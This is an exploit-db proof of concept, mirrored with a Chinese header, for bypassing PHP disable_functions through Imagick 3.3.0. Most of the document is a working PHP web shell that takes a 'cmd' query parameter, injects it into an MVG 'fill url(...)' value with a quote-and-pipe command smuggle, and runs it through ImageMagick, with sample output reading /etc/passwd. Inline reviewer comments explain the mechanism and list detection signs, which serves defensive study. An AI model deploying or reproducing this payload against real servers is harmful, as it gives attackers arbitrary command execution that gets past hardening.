Imagick 3.3.0 (PHP 5.4) – disable_functions Bypass

  • 作者: RicterZ
    日期: 2016-05-04
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/39766/
  • # Exploit Title: PHP Imagick disable_functions Bypass
    # Date: 2016-05-04
    # Exploit Author: RicterZ (ricter@chaitin.com)
    # Vendor Homepage: https://pecl.php.net/package/imagick
    # Version: Imagick <= 3.3.0, PHP >= 5.4
    # Test on: Ubuntu 12.04
    
    # Exploit:
    
    <?php
    # PHP Imagick disable_functions Bypass
    # Author: Ricter <ricter@chaitin.com>
    #
    # $ curl "127.0.0.1:8080/exploit.php?cmd=cat%20/etc/passwd"
    # <pre>
    # Disable functions: exec,passthru,shell_exec,system,popen
    # Run command: cat /etc/passwd
    # ====================
    # root:x:0:0:root:/root:/usr/local/bin/fish
    # daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    # bin:x:2:2:bin:/bin:/bin/sh
    # sys:x:3:3:sys:/dev:/bin/sh
    # sync:x:4:65534:sync:/bin:/bin/sync
    # games:x:5:60:games:/usr/games:/bin/sh
    # ...
    # </pre>
    #
    # Review notes (a defender's reading of this PoC):
    #   - No PHP execution function is called anywhere in this script (only
    #     ini_get, tempnam, file_put_contents, Imagick methods, file_get_contents).
    #     The shell pipeline embedded in the MVG below is presumably run by
    #     ImageMagick's own delegate handling when the 'url(...)' fill is resolved,
    #     which is why PHP's disable_functions never applies: it is a function
    #     blacklist, not a process sandbox. The effective controls are on the
    #     ImageMagick side (coder policy in policy.xml, patched version) and
    #     OS-level isolation of the PHP worker.
    #   - Detection: an ImageMagick child process of the web server / php-fpm
    #     worker spawning a shell; "img*" files left behind in /tmp; requests
    #     carrying a "cmd" query parameter.
    echo "Disable functions: " . ini_get("disable_functions") . "\n";
    # Untrusted input: $_GET['cmd'] is used verbatim, both in the echo below
    # (no HTML escaping) and inside the MVG payload.
    $command = isset($_GET['cmd']) ? $_GET['cmd'] : 'id';
    echo "Run command: $command\n====================\n";
    
    # $data_file receives the command's stdout; $imagick_file holds the crafted
    # MVG document. Neither is unlinked, so both persist in /tmp after the request.
    $data_file = tempnam('/tmp', 'img');
    $imagick_file = tempnam('/tmp', 'img');
    
    # MVG (Magick Vector Graphics) document. The 'fill url(...)' value is the part
    # ImageMagick hands to a delegate; the closing double quote and the '|' inside
    # it terminate the intended URL and append the pipeline "$command > $data_file".
    $exploit = <<<EOF
    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://127.0.0.1/image.jpg"|$command>$data_file")'
    pop graphic-context
    EOF;
    
    file_put_contents("$imagick_file", $exploit);
    $thumb = new Imagick();
    # readImage() is the trigger: parsing the MVG is what runs the delegate. The
    # temp file has no extension, so format detection presumably goes by content
    # — TODO confirm against the ImageMagick version in use.
    $thumb->readImage("$imagick_file");
    # A third temp file is created for the written image and never referenced again.
    $thumb->writeImage(tempnam('/tmp', 'img'));
    $thumb->clear();
    $thumb->destroy();
    
    # The payload redirected the command's output into $data_file; print it back.
    echo file_get_contents($data_file);
    ?>